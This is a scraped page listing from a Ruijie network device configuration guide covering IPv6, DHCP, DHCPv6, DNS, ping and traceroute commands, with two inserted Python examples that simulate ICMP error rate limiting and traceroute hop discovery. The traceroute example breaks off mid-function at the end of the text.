  • Page 400 Configuration Guide Configuring IPv6 3.4 Configuration Configuration Description and Command (Mandatory) It is used to configure IPv6 addresses and enable IPv6. Configuring IPv6 ipv6 enable Enables IPv6 on an interface. Address Configures the IPv6 unicast address of an interface. ipv6 address (Optional) It is used to enable IPv6 redirection on an interface.
  • Page 401 Configuration Guide Configuring IPv6 3.4.1 Configuring an IPv6 Address Configuration Effect Configure the IPv6 address of an interface to implement IPv6 network communication. Configuration Steps  Enabling IPv6 on an Interface  (Optional) If you do not want to enable IPv6 by configuring an IPv6 address, run the ipv6 enable command. ...
  • Page 402 Ruijie(config-if-GigabitEthernet 0/0)#ipv6 address 2000::1/64 Verification Run the show ipv6 interface command to verify that an address is successfully added to the GigabitEthernet 0/0 interface. Ruijie(config-if-GigabitEthernet 0/0)#show ipv6 interface gigabitEthernet 0/0 interface GigabitEthernet 0/0 is Down, ifindex: 1, vrf_id 0 address(es): Mac Address: 00:00:00:00:00:00...
  • Page 403 Configuration Guide Configuring IPv6 3.4.2 Configuring IPv6 NDP Configuration Effect Configure NDP-related attributes, for example, enable IPv6 redirection and DAD. Notes RA suppression is enabled on interfaces by default. To configure a device to send RA packets, run the no ipv6 nd suppress-ra command in interface configuration mode.
  • Page 404 Configuration Guide Configuring IPv6  Optional.  If the number of IPv6 hosts is controllable, run the ipv6 nd cache interface-limit command to restrict the number of neighbors learned on an interface. This prevents ND learning attacks from occupying the memory space and affecting device performance.
  • Page 405 Configuration Guide Configuring IPv6 Mode Usage Guide A device detects unreachable neighbors based on the configured reachable time. The shorter the configured reachable time, the faster the device detects unreachable neighbors but the more it consumes network bandwidth and device resources. Therefore, it is not recommended to set this time too small.
  • Page 406 Steps Ruijie(config-if-GigabitEthernet 0/0)#ipv6 redirects Verification Run the show ipv6 interface command to check whether the configuration takes effect. Ruijie#show ipv6 interface gigabitEthernet 0/0 interface GigabitEthernet 0/0 is Down, ifindex: 1, vrf_id 0 address(es): Mac Address: 00:00:00:00:00:00 INET6: FE80::200:FF:FE00:1 [ TENTATIVE ], subnet is FE80::/64...
  • Page 407 Configuring IPv6 DAD Configuration Configure the interface to send three consecutive NS packets during DAD. Steps Ruijie(config-if-GigabitEthernet 0/0)# ipv6 nd dad attempts 3 Verification Run the show ipv6 interface command to check whether the configuration takes effect. Ruijie#show ipv6 interface gigabitEthernet 0/0...
  • Page 408 Configuring RA Packets to Obtain Prefixes from the Prefix Pool Configuration Configure RA packets to obtain prefixes from the prefix pool "ra-pool". Steps Ruijie(config-if-GigabitEthernet 0/0)#peer default ipv6 pool ra-pool Verification Run the show run command to check whether the configuration takes effect. Ruijie(config-if-GigabitEthernet 0/0)#show run interface gigabitEthernet 0/0 Building configuration...
  • Page 409 Configuring the Maximum Number of ND Entries Learned on an Interface Configuration Set the maximum number of ND entries learned on an interface to 100. Steps Ruijie(config-if-GigabitEthernet 0/1)# ipv6 nd cache interface-limit 100 Verification Run the show run command to check whether the configuration takes effect. Ruijie#show run...
  • Page 410 Configuration Effect RFC 5095 abolished the Type 0 routing header. Ruijie devices do not support the Type 0 routing header by default. The administrator can run the ipv6 source-route command in global configuration mode to enable IPv6 source routing.
  • Page 411 Steps Ruijie(config)#ipv6 source-route Verification Run the show run command to check whether the configuration takes effect. Ruijie#show run | inc ipv6 source-route ipv6 source-route 3.4.4 Configuring the Sending Rate of ICMPv6 Error Messages Configuration Effect Configure the sending rate of ICMPv6 error messages.
  • Page 412 Configuration Guide Configuring IPv6  Configuring the Sending Rate of Other ICMPv6 Error Messages  Optional.  If a device receives many illegal IPv6 packets and thereby generates many ICMPv6 error messages, run the ipv6 icmp error-interval command to restrict the sending rate of ICMPv6 error messages. (This command does not affect the sending rate of ICMPv6 Packet Too Big messages.) Verification Run the show running-config command to check whether the configuration takes effect.
  • Page 413 Ruijie(config)#ipv6 icmp error-interval 1000 10 Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config | include ipv6 icmp error-interval ipv6 icmp error-interval 1000 10 ipv6 icmp error-interval too-big 1000 100 3.4.5 Configuring the IPv6 Hop Limit Configuration Effect Configure the number of hops of a unicast packet to prevent the packet from being unlimitedly transmitted.
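An added model, not from the Ruijie guide, of the rate limiter behind the ip icmp error-interval [DF] milliseconds [bucket-size] setting on page 360 and the ipv6 icmp error-interval [too-big] milliseconds [bucket-size] setting above: the guide states that milliseconds is the refresh cycle of a token bucket and that "1000 100" yields 100 packets per second, so the example replays a constructed flood of error-triggering packets through two buckets (one for the fragmentation-related class, one for all other errors) and counts how many ICMP error messages leave the device. The refill-to-full-at-each-cycle behaviour and the message class names are this example's assumptions.

```python
"""
Token-bucket model of the ICMP/ICMPv6 error-message rate limit.
Added example; not part of the Ruijie RGOS documentation.
"""
from dataclasses import dataclass, field


@dataclass
class ErrorTokenBucket:
    """One limiter: refilled to bucket_size every interval_ms of virtual time."""
    interval_ms: int
    bucket_size: int
    tokens: int = field(init=False)
    next_refill_ms: int = field(init=False)

    def __post_init__(self) -> None:
        if self.interval_ms <= 0 or self.bucket_size <= 0:
            raise ValueError("interval and bucket size must be positive")
        self.tokens = self.bucket_size
        self.next_refill_ms = self.interval_ms

    def allow(self, now_ms: int) -> bool:
        """Return True if one ICMP error message may be sent at time now_ms."""
        # Every refresh cycle that has elapsed resets the bucket to full
        # (assumption: reset, not cumulative top-up).
        while now_ms >= self.next_refill_ms:
            self.tokens = self.bucket_size
            self.next_refill_ms += self.interval_ms
        if self.tokens == 0:
            return False          # over the configured rate: message suppressed
        self.tokens -= 1
        return True


# Message kinds limited by the dedicated bucket (IPv4 "DF", IPv6 "too-big").
FRAG_KINDS = frozenset({"df-unreachable", "packet-too-big"})


class IcmpErrorLimiter:
    """Two independent buckets, as the guide configures them: one for
    fragmentation-related errors and one for every other ICMP error message."""

    def __init__(self, frag_interval_ms: int, frag_bucket: int,
                 other_interval_ms: int, other_bucket: int) -> None:
        self.frag = ErrorTokenBucket(frag_interval_ms, frag_bucket)
        self.other = ErrorTokenBucket(other_interval_ms, other_bucket)

    def try_send(self, kind: str, now_ms: int) -> bool:
        bucket = self.frag if kind in FRAG_KINDS else self.other
        return bucket.allow(now_ms)


def count_sent(limiter: IcmpErrorLimiter, events: list[tuple[int, str]]) -> dict[str, int]:
    """Replay (time_ms, kind) events in time order; count messages actually sent."""
    sent: dict[str, int] = {}
    for now_ms, kind in sorted(events):
        if limiter.try_send(kind, now_ms):
            sent[kind] = sent.get(kind, 0) + 1
    return sent


def flood(duration_ms: int, kind: str) -> list[tuple[int, str]]:
    """Constructed input: one error-triggering packet per millisecond."""
    return [(t, kind) for t in range(duration_ms)]


def guide_example() -> dict[str, int]:
    """Page 360 setting: DF errors 1000 ms / 100 tokens, other errors 1000 ms / 10.
    Three seconds of oversized DF packets plus three seconds of packets for an
    unroutable host should yield 300 and 30 messages respectively."""
    limiter = IcmpErrorLimiter(1000, 100, 1000, 10)
    events = flood(3000, "df-unreachable") + flood(3000, "host-unreachable")
    return count_sent(limiter, events)


if __name__ == "__main__":
    print(guide_example())   # {'df-unreachable': 300, 'host-unreachable': 30}
```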
  • Page 414  Configuring the IPv6 Hop Limit Configuration Change the IPv6 hop limit of a device to 250. Steps Ruijie(config)#ipv6 hop-limit 250 Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config ipv6 hop-limit 254 3.5 Monitoring Clearing Running the clear commands may cause loss of vital information and thus interrupt services.
  • Page 415: Scenario

    Configuration Guide Configuring DHCP 4 Configuring DHCP 4.1 Overview The Dynamic Host Configuration Protocol (DHCP) is a LAN protocol based on the User Datagram Protocol (UDP) for dynamically assigning reusable network resources, for example, IP addresses. DHCP works in client/server mode. A DHCP client sends a request message to a DHCP server to obtain an IP address and other configurations.
  • Page 416: Scenario

    Configuration Guide Configuring DHCP Figure 4-1 Remark S is an egress gateway working as a DHCP server. A, B, C and D are access switches achieving layer-2 transparent transmission. User 1, User 2, User 3 and User 4 are LAN users. Deployment 
  • Page 417: Scenario

    Configuration Guide Configuring DHCP Deployment  Enable DHCP Server on S.  Enable DHCP Client on the interfaces of A, B, C and D. 4.2.3 Applying AM Rule on DHCP Server Scenario As shown in Figure 4-3, create a Super VLAN, configure an AM rule and enable DHCP Server on the core switch A. B is an aggregation switch, C an access switch, and D a wireless access device.
  • Page 418: Scenario

    Configuration Guide Configuring DHCP 4.2.4 Deploying DHCP Relay in Wired Network Scenario As shown in the following figure, Switch C and Switch D are access devices for the users in VLAN 10 and VLAN 20 respectively. Switch B is a gateway, and Switch A a core device. The requirements are listed as follows: Switch A works as a DHCP server to assign IP addresses of different network segments dynamically to users in different VLANs.
  • Page 419: Scenario

    Configuration Guide Configuring DHCP AP is a wireless access point. Remark AC is a wireless management device and DHCP Relay agent. DHCP Server is a core device responsible for assigning IP addresses to wireless users. Deployment  Connect AP to AC. 
  • Page 420 Configuration Guide Configuring DHCP Figure 4-6 Applying AM Rule on DHCP Relay Remark A is a core device. B is a core device. C is an aggregation device. D is a wired access device. E is a wireless access device. Deployment 
  • Page 421: Dhcp Server

    Basic Concepts  DHCP Server Based on the RFC 2131, Ruijie DHCP server assigns IP addresses to clients and manages these IP addresses.  DHCP Client DHCP Client enables a device to automatically obtain an IP address and configurations from a DHCP server.
  • Page 422 During the negotiation, if a client does not respond to the DHCPOFFER packets in time, servers will send DHCPNAK packets to the client and the client will reinitiate the process. During network construction, Ruijie DHCP servers have the following features: ...
  • Page 423: Dhcp Relay Agent

    Adding Trusted ARP A trusted ARP entry prevents gateway ARP spoofing. Ruijie devices enabled with DHCP provide a command for pushing a trusted ARP entry while assigning an address. After this function is enabled, the DHCP server pushes the trusted ARP entry while assigning an IP address to the client, to prevent ARP spoofing.
  • Page 424: Scenario

    As defined in RFC 3046, an option can be added to indicate a DHCP client's network information when DHCP Relay is performed, so that a DHCP server may assign IP addresses of various privileges based on more accurate information. This option is called Option 82. Currently, Ruijie devices support the following relay agent information schemes: 13.
  • Page 425: Dhcp Client

    Configuration Guide Configuring DHCP In a DHCP environment, multiple DHCP servers are deployed for a network to achieve server backup and ensure uninterrupted network operation. After this function is enabled, the DHCP request packet sent by a client contains a server-id option specifying a DHCP server. To alleviate the burden on servers in specific environments, enable this function on a relay agent so that it sends a packet to the specified DHCP server rather than to all DHCP servers.
  • Page 426 Configuration Guide Configuring DHCP  By default, DHCP Client is disabled.  In interface configuration mode, you may run the ip address dhcp command to enable DHCP Client.  You need to enable DHCP Client to enable DHCP service. 
  • Page 427 Configuration Guide Configuring DHCP Configuration Description and Command netbios-node-type Configures a NetBIOS node type on a client. lease-threshold Configures an alarm threshold of an address pool. option Configures a user-defined option. pool-status Enables or disables an address pool. update arp Adds a trusted ARP while assigning addresses from a pool.
  • Page 428 Configuration Guide Configuring DHCP Configuration Description and Command (Optional) It is used to assign IP addresses of different privileges to clients in combination with the information of a physical port. Configuring DHCP Relay Option 82 dhcp relay information option82 Enables DHCP Option 82. (Optional) It is used to enable a DHCP Relay agent to send DHCP request packets only to a specified server.
  • Page 429 Configuration Guide Configuring DHCP  Configuring Network Number and Subnet Mask of DHCP Address Pool  Mandatory. It defines a range of dynamically assigned addresses.  Run the network command in DHCP address pool configuration mode.  Configuring Default Gateway of Client 
  • Page 430 Configuration Guide Configuring DHCP  Enabling or Disabling Address Pool  Optional. It is used to enable or disable an address pool. It is enabled by default.  Run the pool-status command in DHCP address pool configuration mode.  Adding Trusted ARP 
  • Page 431 If the start and end addresses are not specified, all IP addresses in the network segment are assignable. For Ruijie products, addresses are assigned based on the client's physical address and ID. Therefore, one client will not be assigned two leases from one address pool. In the case of topological redundancy between a client and a server, address assignment may fail.
  • Page 432 Command domain-name domain Parameter Description domain-name: Defines a domain name of a DHCP client. Command Mode DHCP address pool configuration mode Usage Guide You may define a domain name for a client. When the client accesses the network through the host name, the domain name will be added automatically to complete the host name.
  • Page 433 Disable an address pool. It is enabled by default. Command Mode DHCP address pool configuration mode Usage Guide A Ruijie wireless product provides a command for you to enable/disable a DHCP address pool. - Adding Trusted ARP Command update arp Parameter...
  • Page 434 The default gateway is 172.16.16.254. - The address lease is 1 day. - Excluded addresses range from 172.16.1.2 to 172.16.1.100. Ruijie(config)# ip dhcp excluded-address 172.16.1.2 172.16.1.100 Ruijie(config)# ip dhcp pool net172 Ruijie(dhcp-config)# network 172.16.1.0 255.255.255.0 Ruijie(dhcp-config)# default-router 172.16.1.254 Ruijie(dhcp-config)# lease 1 Verification Run the show run command to display the configuration.
  • Page 435 - Optional. It is used to configure a MAC address. - Run the hardware command in DHCP address pool configuration mode. - Configuring Unique Client Identifier - Optional. It is used to configure a static user identifier (UID). ...
  • Page 436 Ruijie(dhcp-config)# network 20.1.1.0 255.255.255.0 Ruijie(dhcp-config)# default-router 172.16.1.254 Ruijie(dhcp-config)# lease 1 0 0 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp ip dhcp pool vlan1 network 20.1.1.0 255.255.255.0 hardware-address 00d0.df34.32a3 Ethernet default-router 20.1.1.1 lease 1 0 0 ...
  • Page 437 Configuration Effect Assign IP addresses according to an AM rule based on a port and a VLAN. Notes Ruijie products support AM rule configuration on Ethernet, GB, FR, PPP and HDLC interfaces. Configuration Steps - Run the address-manage command in config mode.
  • Page 438 Configure a rule based on a specific VLAN and address range. Ruijie(config)# address-manage Ruijie(config-address-manage)# match ip default 172.50.128.0 255.255.128.0 Ruijie(config-address-manage)# match ip 10.1.5.0 255.255.255.0 Gi5/3 vlan 1005 Ruijie(config-address-manage)# match ip 10.1.6.0 255.255.255.0 vlan 1006 Verification 1: Run the show run command to display the configuration.
  • Page 439 4.4.4 Configuring Global Properties of DHCP Server Configuration Effect Enable a server with specific functions, for example, ping and compulsory NAK. Notes Configuring the command may cause exceptions on other servers. Configuration Steps - Configuring Excluded IP Address ...
  • Page 440 Related Commands - Configuring Excluded IP Address Command ip dhcp excluded-address low-ip-address [ high-ip-address ] Parameter Description low-ip-address: Indicates a start IP address. high-ip-address: Indicates an end IP address. Command Mode Global configuration mode Usage Guide Unless otherwise specified, a DHCP server assigns all the addresses from an IP address pool to DHCP clients.
  • Page 441 Configuration Steps - Set ping times to 5. - Set ping timeout to 800 ms. Ruijie(config)# ip dhcp ping packet 5 Ruijie(config)# ip dhcp ping timeout 800 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp...
  • Page 442 Configuration Steps - Configure the excluded IP address range from 192.168.0.0 to 192.168.255.255. Ruijie(config)# ip dhcp excluded-address 192.168.0.0 192.168.255.255 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp ip dhcp excluded-address 192.168.0.0 192.168.255.255 4.4.5 Configuring Basic DHCP Relay Functions...
  • Page 443: Scenario

    Ruijie(config)# interface gigabitEthernet 0/1 Ruijie(config-if)# ip address 192.1.1.1 255.255.255.0 Configure an IP address for the port connected to the server. Ruijie(config)# interface gigabitEthernet 0/2 Ruijie(config-if-gigabitEthernet 0/2)# ip address 172.2.2.2 255.255.255.0 Enable DHCP Server. Ruijie(config)# service dhcp Configure an address pool.
  • Page 444 Ruijie(config-if-gigabitEthernet 0/2)# ip address 172.2.2.1 255.255.255.0 Verification - Check whether the client obtains an IP address. - Check the DHCP Relay configuration. The user device obtains an IP address.
  • Page 445 Ruijie(config)# ip dhcp relay information option82 Verification After logging in to the DHCP relay agent, run the show running-config command in privileged EXEC mode to display the DHCP Relay configuration. Ruijie#show ru | incl ip dhcp relay ip dhcp relay information option82 Common Errors ...
  • Page 446 Ruijie(config)# ip dhcp relay check server-id Verification After logging in to the DHCP relay agent, run the show running-config command in privileged EXEC mode to display the DHCP Relay configuration. Ruijie# show running-config | include check server-id ip dhcp relay check server-id Ruijie#...
  • Page 447 Configuration Example - Configuring DHCP Relay Suppression Configuration Steps - Configure basic DHCP Relay functions. - Configure DHCP Relay suppression on an interface. Ruijie# configure terminal Ruijie(config)# interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip dhcp relay suppression Ruijie(config-if-GigabitEthernet 0/1)#end Ruijie#...
  • Page 448 Enable DHCP Client on a device so that it obtains IP addresses and configurations dynamically. Notes Ruijie products support DHCP Client configuration on Ethernet, FR, PPP and HDLC interfaces. Configuration Steps Run the ip address dhcp command on an interface.
  • Page 449 Ruijie(config)# interface FastEthernet0/0 Ruijie(config-if-FastEthernet 0/0)#ip address dhcp Verification 1: Run the show run command to display the configuration. Ruijie(config)#show run | begin ip address dhcp ip address dhcp 4.5 Monitoring Clearing Running the clear commands may cause loss of vital information and interrupt services.
  • Page 450 debug ip dhcp client Debugs DHCP packets. debug ip dhcp relay Debugs DHCP Relay events...
  • Page 451 Configuration Guide Configuring DHCPv6 5 Configuring DHCPv6 5.1 Overview The Dynamic Host Configuration Protocol for IPv6 (DHCPv6) is a protocol that allows a DHCP server to transfer configurations (such as IPv6 addresses) to IPv6 nodes. Compared with other IPv6 address allocation methods, such as manual configuration and stateless address autoconfiguration, DHCPv6 provides address allocation, prefix delegation, and configuration parameter allocation.
  • Page 452: Scenario

    - RFC3633: IPv6 Prefix Options for Dynamic Host Configuration Protocol (DHCP) Version 6 - RFC3646: DNS Configuration Options for Dynamic Host Configuration Protocol for IPv6 (DHCPv6) - RFC3736: Stateless DHCP Service for IPv6 - RFC5417: Control And Provisioning of Wireless Access Points (CAPWAP) Access Controller DHCP Option 5.2 Applications Application Description...
  • Page 453: Scenario

    Deployment - Run the DHCPv6 client on a host in the subnet to obtain an IPv6 address and other parameters. - Run the DHCPv6 server on a device and configure the IPv6 addresses and other parameters to be allocated.
  • Page 454: Scenario

    5.2.3 Relay Service Scenario The DHCPv6 relay agent provides the relay service for a DHCPv6 client and a DHCPv6 server on different links to enable communication between them. As shown in Figure 5-4: - Device 1 is enabled with the DHCPv6 relay agent, with 3001::2 as the relay destination. ...
  • Page 455 - Temporary Addresses (TAs), which are rarely used. - Prefix Delegation (PD). Based on the address type, IAs are classified into IA_NA, IA_TA, and IA_PD (three IA types). Ruijie DHCPv6 servers support only IA_NA and IA_PD. - Binding A DHCPv6 binding is a manageable address information structure. The address binding data on a DHCPv6 server records the IA and other configurations of every client.
  • Page 456 Packets that may be sent by a DHCPv6 relay agent to another DHCPv6 relay agent or a DHCPv6 server include Relay-reply. Ruijie DHCPv6 servers do not support the Reconfigure packet. Ruijie DHCPv6 clients do not support the Confirm and Reconfigure packets. Overview Feature...
  • Page 457 - A DHCPv6 client sends a Solicit message whose destination address is FF02::1:2 and destination port number is 547 within the local link to request address, prefix and configuration parameter allocation. All DHCPv6 servers or DHCPv6 relay agents within the link will receive the Solicit message.
  • Page 458 allocated to the DHCPv6 client. The DHCPv6 client completes configuration based on the information in the Reply message. - Update and Rebinding The DHCPv6 server provides the control address and the updated T1 and T2 in the IA of the message sent to the DHCPv6 client.
  • Page 459 If a DHCPv6 client needs to release an address or a prefix, it sends a Release message to the DHCPv6 server to notify it of the released addresses or prefixes. In this way, the DHCPv6 server can allocate these addresses and prefixes to other DHCPv6 clients.
  • Page 460 - The DHCPv6 client includes the IA information of the conflicting addresses in the Decline message. - After receiving the Decline message, the DHCPv6 server marks the addresses in the Decline message as "declined" and will not allocate these addresses. Then, the DHCPv6 server sends a Reply message carrying the state option to the DHCPv6 client.
  • Page 461 5.3.2 Requesting/Allocating Prefixes Configure available prefixes on the DHCPv6 server. By using DHCPv6 prefix delegation, uplink network devices can allocate address prefixes to downlink network devices, which enables flexible station-level automatic configuration and flexible control of the station address space. Working Principle Downlink network devices serve as DHCPv6 clients and exchange messages with the DHCPv6 server to implement address allocation, update, release and other operations.
  • Page 462 5.3.3 Stateless Service When a DHCPv6 client needs only configuration parameters, the DHCPv6 stateless service can be used to obtain the configuration parameters that cannot be obtained through the stateless address autoconfiguration protocol, such as the DNS server address.
  • Page 463 - If a host receives an RA message containing the O flag, it will enable the stateless service. 5.3.4 Relay Service When the DHCPv6 client and DHCPv6 server are on different links, the DHCPv6 client can relay related messages to the DHCPv6 server through the DHCPv6 relay agent.
  • Page 464 Configuration Description and Command (Optional) It is used to allocate addresses. iana-address prefix Configures the address prefixes to be allocated on the DHCPv6 server. (Optional) It is used to allocate prefixes. prefix-delegation Configures prefixes of statically bound addresses on the DHCPv6 server.
  • Page 465 5.4.1 Configuring the DHCPv6 Server Configuration Effect - An uplink device can automatically allocate DHCPv6 addresses, prefixes and configuration parameters to a downlink device. Notes - To provide the DHCPv6 server service, you must specify a DHCPv6 server configuration pool. ...
  • Page 466 - Configuring the DNS Server on the DHCPv6 Server - Optional. - To allocate DNS servers, you should configure the DNS server on all devices that need to provide the DHCPv6 server service. - Configuring Domain Names on the DHCPv6 Server ...
  • Page 467 Command iana-address prefix ipv6-prefix/prefix-length [ lifetime { valid-lifetime | preferred-lifetime } ] Parameter Description ipv6-prefix/prefix-length: Indicates an IPv6 address prefix and the prefix length. lifetime: Sets the valid time of the address allocated to a client. This keyword must be configured together with valid-lifetime and preferred-lifetime.
  • Page 468 pool and allocates the prefix to the client. When the client no longer uses this prefix, the DHCPv6 server reclaims it. - Configuring a Local IPv6 Prefix Pool Command ipv6 local pool poolname prefix/prefix-length assigned-length Parameter Description poolname: Indicates the name of a local prefix pool.
  • Page 469 Configure the domain name.  Enable the DHCPv6 server service on an interface. Ruijie# configure terminal Ruijie(config)# ipv6 dhcp pool pool1 Ruijie(config-dhcp)# iana-address prefix 2008:50::/64 lifetime 2000 1000 Ruijie(config-dhcp)# prefix-delegation 2008:2::/64 0003000100d0f82233ac Ruijie(config-dhcp)# dns-server 2008:1::1 Ruijie(config-dhcp)# dns-server 2008:1::2 Ruijie(config-dhcp)# domain-name example.com...
  • Page 470 Ruijie(config-if)# ipv6 dhcp server pool1 - Verification Run the show ipv6 dhcp pool command to display the created configuration pool. Ruijie# show ipv6 dhcp pool DHCPv6 pool: pool1 Static bindings: Binding for client 0003000100d0f82233ac IA PD prefix: 2008:2::/64 preferred lifetime 3600, valid lifetime 3600 IANA address range: 2008:50::1/64 ->...
  • Page 471 5.4.2 Configuring the DHCPv6 Relay Configuration Effect - A DHCPv6 relay agent can be configured for address allocation, prefix delegation and parameter allocation to enable communication between the DHCPv6 client and server on different links. Notes ...
  • Page 472 Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)#interface vlan 1 Ruijie(config-if)#ipv6 dhcp relay destination 3001::2 Ruijie(config-if)#ipv6 dhcp relay destination ff02::1:2 vlan 2 Verification Run the show ipv6 dhcp relay destination all command to display the configured destination addresses.
  • Page 473 - It is mandatory if the DHCPv6 client needs to obtain configuration parameters. Verification Check whether the DHCPv6 client is enabled on the interface and check the addresses, prefixes and other configuration obtained on the interface. Related Commands ...
  • Page 474 - Verification Run the show ipv6 dhcp interface command to display whether the DHCPv6 client is enabled on the interface. Ruijie#show ipv6 dhcp interface GigabitEthernet 0/1 GigabitEthernet 0/1 is in client mode Rapid-Commit: disable - Enabling the DHCPv6 Client Prefix Request ...
  • Page 475 - Verification Run the show ipv6 dhcp interface command to display whether an interface of the host obtains configuration parameters. Ruijie#show ipv6 dhcp interface GigabitEthernet 0/2 GigabitEthernet 0/2 is in client mode DNS server: 2001::1 Rapid-Commit: disable Common Errors ...
  • Page 476 show ipv6 dhcp server statistics Displays statistics of the DHCPv6 server. show ipv6 dhcp relay destination { all | interface-type interface-number } Displays the destination address of the DHCPv6 relay agent. show ipv6 dhcp relay statistics Displays the statistics on sent and received packets after the DHCPv6 relay is enabled on a device.
  • Page 477: Scenario

    Configuration Guide Configuring DNS 6 Configuring DNS 6.1 Overview A Domain Name System (DNS) is a distributed database containing mappings between domain names and IP addresses on the Internet, which allows users to access the Internet without remembering the IP strings that computers use directly.
  • Page 478 Figure 6-1 Dynamic Domain Name Resolution Deployment - Deploy DNS Server as the DNS server of Device-A. 6.3 Features Basic Concepts - The DNS consists of a resolver and a DNS server. The DNS server stores the mappings between domain names and IP addresses of all hosts on the network, and implements mutual conversion between domain names and IP addresses.
  • Page 479 The procedure of dynamic domain name resolution is as follows: 14. A user application program (such as Ping or Telnet) requests the IP address mapped to a domain name from the DNS resolver of the system. 15.
  • Page 480 Configuring the DNS Whitelist Function Optional. ip name-server white-list enable Enables the DNS whitelist function. ip name-server white-list Configures IP addresses of valid DNS servers. 6.4.1 Configuring Static Domain Name Resolution Configuration Effect The system resolver resolves the IP address mapped to a domain name on a local device. Configuration Steps ...
  • Page 481 Configuration Steps Set the IP address of static domain name www.testv6.com to 2001::1 on a device. Ruijie#configure terminal Ruijie(config)# ip host www.test.com 192.168.1.1 Ruijie(config)# ipv6 host www.testv6.com 2001::1 Ruijie(config)# exit Verification Run the show hosts command to check whether the static domain name entry is configured.
  • Page 482: Scenario

    Set the IP address of the DNS server to 192.168.10.1 on the device. Configuration Steps DEVICE#configure terminal DEVICE(config)# ip name-server 192.168.10.1 DEVICE(config)# exit Verification Run the show hosts command to check whether the DNS server is specified. Ruijie(config)#show hosts Name servers are: 192.168.10.1 static Host type Address TTL(sec) 6.5 Monitoring Clearing Running the clear command during device operation may cause data loss or even interrupt services.
  • Page 483 show hosts [ host-name ] Displays DNS parameters. Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use. Command Description debug ip dns Debugs the DNS function...
  • Page 484: Scenario

    Configuration Guide Configuring Network Communication Test Tools 7 Configuring Network Communication Test Tools 7.1 Overview Network communication test tools can be used to check the connectivity of a network and help you analyze and locate network faults. Network communication test tools include Packet Internet Groper (PING) and Traceroute. Ping is used to check the connectivity and delay of a network.
  • Page 485: Ping Test

    7.2.2 Host Route Test Scenario As shown in Figure 7-2, Network Device A and Target Host B are connected to the IP network. If both the network device and the target host are connected to the IP network, the host route test aims to check the gateways (or routers) that IP packets pass through between the two ends.
  • Page 486 the message, the first router on the path decreases the TTL by 1. As the TTL becomes 0, the router drops the packet and returns an ICMP time exceeded message to the network device. After receiving this message, the traceroute tool learns that this router exists on this path, and then sends an ICMP Request packet with TTL 2 to the destination host to discover the second router.
  • Page 487 Command ping [ipv] [address [length length ] [ntimes times] [timeout seconds] [data data] [source source] [df-bit] [validate] [detail]] Parameter Description address: Specifies the destination IPv4 address or domain name. length: Specifies the length of the data packet. The value ranges from 36 to 18,024. The default length is 100.
  • Page 488 Configuration Steps In Privileged EXEC mode, run the ping 192.168.21.26 command. Common ping command: Ruijie# ping 192.168.21.26 Sending 5, 100-byte ICMP Echoes to 192.168.21.26, timeout is 2 seconds: < press Ctrl+C to break > !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms Detailed ping command: Ruijie#ping 192.168.21.26 detail...
  • Page 489 Common ping command: Ruijie# ping 192.168.21.26 length 1500 ntimes 100 data ffff source 192.168.21.99 timeout 3 Sending 100, 1500-byte ICMP Echoes to 192.168.21.26, timeout is 3 seconds: < press Ctrl+C to break >...
  • Page 490 Configuration Steps In Privileged EXEC mode, run the ping ipv6 2001::1 command. Common ping command: Ruijie# ping ipv6 2001::1 Sending 5, 100-byte ICMP Echoes to 2001::1, timeout is 2 seconds: < press Ctrl+C to break > !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms...
  • Page 491 Ruijie# ping ipv6 2001::5 length 1500 ntimes 100 data ffff source 2001::9 timeout 3 Sending 100, 1500-byte ICMP Echoes to 2000::1, timeout is 3 seconds: < press Ctrl+C to break > !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!
  • Page 492 Configuration Steps - To trace the route an IPv4 packet would follow to the destination host, run the traceroute IPv4 command. - To trace the route an IPv6 packet would follow to the destination host, run the traceroute IPv6 command. Verification Run the traceroute command to display related information on the CLI window.
  • Page 493 Ruijie# traceroute 61.154.22.36 < press Ctrl+C to break > Tracing the route to 61.154.22.36 192.168.12.1 0 msec 0 msec 0 msec 192.168.9.2 4 msec 4 msec 4 msec 192.168.9.1 8 msec 8 msec 4 msec 192.168.0.10...
  • Page 494 Ruijie# traceroute 202.108.37.42 < press Ctrl+C to break > Tracing the route to 202.108.37.42 192.168.12.1 0 msec 0 msec 0 msec 192.168.9.2 0 msec 4 msec 4 msec 192.168.110.1 16 msec 12 msec 16 msec * * * 61.154.8.129...
  • Page 495 Ruijie# traceroute ipv6 3004::1 < press Ctrl+C to break > Tracing the route to 3004::1 3000::1 0 msec 0 msec 0 msec 3001::1 4 msec 4 msec 4 msec 3002::1 8 msec 8 msec 4 msec...
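The TTL-driven discovery described on this page is easy to see in a simulation. The Python script below is an added example, not code from the Ruijie manual: it models a constructed path of routers, each decrementing TTL and either answering with ICMP time exceeded or silently dropping the expired probe, and shows how the tool walks the path one hop at a time. The router addresses, the silent third hop (which is what the `* * *` line in a real traceroute output means) and the three-probes-per-hop convention are assumptions for the illustration; nothing is sent on a network.

```python
# Added example (not from the Ruijie manual): a simulation of the TTL-based
# discovery traceroute performs. The path, the router addresses and the
# silent hop are constructed here; no packets leave the host.
from typing import List, Optional, Tuple

# Constructed path: each router is (address, answers_with_icmp). The third
# router drops expired packets without an ICMP time-exceeded reply, which is
# what a "* * *" line in a real traceroute output represents.
PATH = [("192.168.12.1", True), ("192.168.9.2", True), ("192.168.110.1", False)]
TARGET = "61.154.22.36"


def send_probe(ttl: int, path, target: str) -> Optional[str]:
    """Forward one probe hop by hop. Each router decrements TTL; at 0 it drops the
    packet and, if it cooperates, answers with ICMP time exceeded from its own
    address. Returns the responder's address, the target if reached, or None."""
    for addr, answers in path:
        ttl -= 1
        if ttl == 0:
            return addr if answers else None
    return target   # TTL survived every router: echo reply from the target


def traceroute(path, target: str, max_hops: int = 30, probes: int = 3) -> List[Tuple[int, List[Optional[str]]]]:
    """Increase TTL from 1 until the target answers or max_hops is reached."""
    hops = []
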